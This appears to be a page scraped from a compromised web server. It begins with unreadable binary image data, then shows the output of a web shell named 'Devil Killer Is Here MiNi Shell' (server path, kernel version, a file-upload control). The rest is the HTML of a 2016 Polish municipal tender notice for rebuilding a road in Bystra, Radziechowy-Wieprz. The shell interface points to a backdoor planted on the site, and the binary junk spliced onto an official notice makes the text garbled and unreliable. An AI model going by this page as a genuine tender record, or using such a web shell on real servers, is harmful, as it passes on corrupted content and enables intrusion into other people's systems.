JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160805/300443-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 300443 - 2016
              z dnia 2016-08-05 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Radziechowy: Odbudowa wypłukanej nawierzchni na całej długości drogi do Brańka
w miejscowości Bystra, w km 0+000 do 0+170
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej lub wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Prawo zamówień publicznych, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych::</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Radziechowy - Wieprz, krajowy numer identyfikacyjny
              55084100000, ul.
              Wieprz 
              700,
              34381  
              Radziechowy, woj.
              śląskie, państwo
              , tel.
              33 8676610 w. 112, e-mail
              , faks
              338 676 613.
              <br />
              adres strony internetowej  www.radziechowy-wieprz.pl <br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów zamówienia można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.radziechowy-wieprz.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.radziechowy-wieprz.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px"><br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px"><br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br /><br /><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br /><br />
                Pod adres:
                <br />Urząd Gminy Radziechowy-Wieprz, Wieprz 700, 34-381 Radziechowy </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnodostępne </b><div style="padding-left: 20px"><br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Odbudowa wypłukanej nawierzchni na całej długości drogi do Brańka
w miejscowości Bystra, w km 0+000 do 0+170
<br /><b>Numer referencyjny: </b>OR.271.10.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify" /><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) </b><br /><b>Zamówienie podzielone jest na części:</b><br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia  <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiot zamówienia  pn: Odbudowa wypłukanej nawierzchni na całej długości drogi do Brańka w miejscowości Bystra, w km 0+000 do 0+170, obejmuje odbudowę nawierzchni drogi gminnej, poprawę odwodnienia przebudowywanego odcinka drogi oraz poprawę bezpieczeństwa przebudowywanego odcinka drogi, zgodnie z dokumentacją projektową, przedmiarem robót oraz specyfikacją techniczną wykonania i odbioru robót budowlanych (załączniki nr 7-9 do Specyfikacji Istotnych Warunków Zamówienia). 
2. W/w zadanie stanowi usuwanie skutków klęsk żywiołowych na terenie gminy Radziechowy-Wieprz. Zamawiający wymaga, aby zamówienie zostało wykonane zgodnie z ustawą z dnia 11 sierpnia 2001r. o szczególnych zasadach odbudowy, remontów i rozbiórek obiektów budowlanych zniszczonych lub uszkodzonych w wyniku działania żywiołu (Dz.U.2001.84.906 z późn. zm.).
<br /><br /><b>II.5) Główny kod CPV: </b>45233140-2<br /><b>
                II.6) Całkowita wartość zamówienia <i>(jeżeli zamawiający podaje informacje o wartości zamówienia</i>:
              </b>
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/09/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                NIE DOTYCZY<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Warunek znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający uzna za spełniony, jeżeli Wykonawca przedłoży opłaconą polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 100 000 zł (sto tysięcy złotych), a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na w/w kwotę<br />
                Informacje dodatkowe
                <b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek dysponowania potencjałem technicznym Zamawiający uzna za spełniony, gdy Wykonawca złoży oświadczenie na formularzu stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia.
Warunek dysponowania osobami zdolnymi do wykonania przedmiotowego zamówienia Zamawiający uzna za spełniony, gdy Wykonawca złoży oświadczenie na formularzu stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia
<br />
                Czy zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br /></div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a)	Oświadczenie o braku podstaw do wykluczenia;
b)	Aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)	Opłaconą polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 100 000 zł (sto tysięcy złotych), a przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">a)	Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów określających, czy roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Pełnomocnictwo udzielone reprezentantowi wykonawców do reprezentowania wykonawców  w niniejszym postępowaniu albo reprezentowania  w postępowaniu  i zawarcia umowy  w sprawie zamówienia publicznego zgodnie z art. 23 ust. 2 Ustawy w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego;
Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile  nie wynika to z przedstawionych dokumentów rejestrowych, złożone w oryginale lub notarialnie poświadczonej kopii;
Kosztorys ofertowy zgodny z treścią przedmiaru robót
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Warunkiem udziału Wykonawcy w postępowaniu jest wniesienie wadium  
w wysokości 1500 zł (słownie: jeden tysiąc pięćset złotych). 
2.	Wadium może być wniesione w jednej lub kilku formach:
    -  w pieniądzu -  winno być wpłacone  na rachunek bankowy Zamawiającego w Radziechowach-Wieprzu  Nr rachunku  93 8140 0009 0000 0127 2000 0110   (niedopuszczalne jest wniesienie wadium w kasie Zamawiającego)
-  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej,    z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-     gwarancjach bankowych;
-     gwarancjach ubezpieczeniowych;
-   w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b  ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j.  Dz. U. z 2014 roku  poz. 1804 oraz z 2015r. poz. 978 i 1240)  
3.W przypadku wniesienia wadium w poręczeniach, gwarancjach bankowych, gwarancjach ubezpieczeniowych, w poręczeniach  stosowną umowę należy złożyć do depozytu w kasie  Zamawiającego.
4.Wadium należy wnieść  przed  terminem składania ofert.
5.Wadium wniesione w pieniądzu musi być na koncie Zamawiającego przed terminem  składania ofert (dniem wniesienia jest dzień uznania na rachunku Zamawiającego).
6. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Ustawy.
7. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
10. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1)   odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)   nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)   zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
13. Wykonawca, który nie wniósł wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 albo nie zgodzi się na przedłużony okres związania ofertą, zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona bez rozpatrzenia.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br /><br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br /><br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br /><br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br /></div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej? <i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> :
              </b>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br /><b>
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              </b><br /><b>Informacje dotyczące przebiegu aukcji elektronicznej: </b><br /><b>Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): </b><br /><b>Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: </b><br /><b>Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: </b><br /><b>Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: </b><div style="padding-left: 20px"><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>90</td></tr><tr><td>Gwarancja</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp (przetarg nieograniczony)</b><br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne (jeżeli dotyczy)</b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
